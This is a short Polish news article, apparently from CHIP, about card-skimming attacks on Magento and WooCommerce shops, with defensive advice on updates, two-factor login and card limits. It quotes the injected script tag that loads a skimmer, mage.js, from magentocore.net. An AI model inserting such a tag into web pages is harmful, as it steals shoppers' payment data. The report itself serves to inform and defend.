Przestępcy najczęściej łamią hasła drogą brute force, czyli przy pomocy botów metodą wielu prób zgadują hasła do panelu administracyjnego. Kiedy już uzyskają dostęp do tego miejsca, umieszczają w serwisie kod JavaScript, który pobiera ze strony magentocore.net złośliwy skrypt mage.js. Jak wykryli specjaliści, strona ze złośliwym oprogramowaniem jest na serwerze w Moskwie.
<script type="text/javascript" src="https://magentocore.net/mage/mage.js"></script>
Hakerzy kradną również hasła, stosując phishing i za pomocą złośliwego oprogramowania instalowanego na komputerach programistów oraz administratorów internetowych sklepów. Nie jest wykluczone, że korzystają z luk bezpieczeństwa w silnikach Magento (należącego do Adobe) i WooCommerce (darmowej wtyczki do WordPressa), zwłaszcza wtedy, kiedy skrypty stron nie są aktualizowane na bieżąco.
Poza śledzeniem informacji o najnowszych lukach bezpieczeństwa i aktualizowaniem serwisu, dobrym pomysłem wydaje się dodanie weryfikacji wieloetapowej. Rozwiązanie opiera się o potwierdzenia SMS albo kod z Google Authenticatora, który jest odświeżany co 30 sekund. Obecnie takie metody są niezbędne, zwłaszcza w przypadku sklepów internetowych. Klienci z kolei powinni ustawić limit finansowy dla transakcji sieciowych, aby przestępcy nie mogli przelać zbyt dużej kwoty w razie kradzieży danych karty. W takim wypadku, co prawda możemy liczyć na zwrot pieniędzy przez bankową procedurę chargeback, jednak lepiej ograniczyć ryzyko.
O problemach z kolei platformy Magento e-Commerce pisaliśmy kilka miesięcy temu. Wtedy chodziło o kradzież pieniędzy z kart kredytowych użytych w sklepie marki OnePlus. | CHIP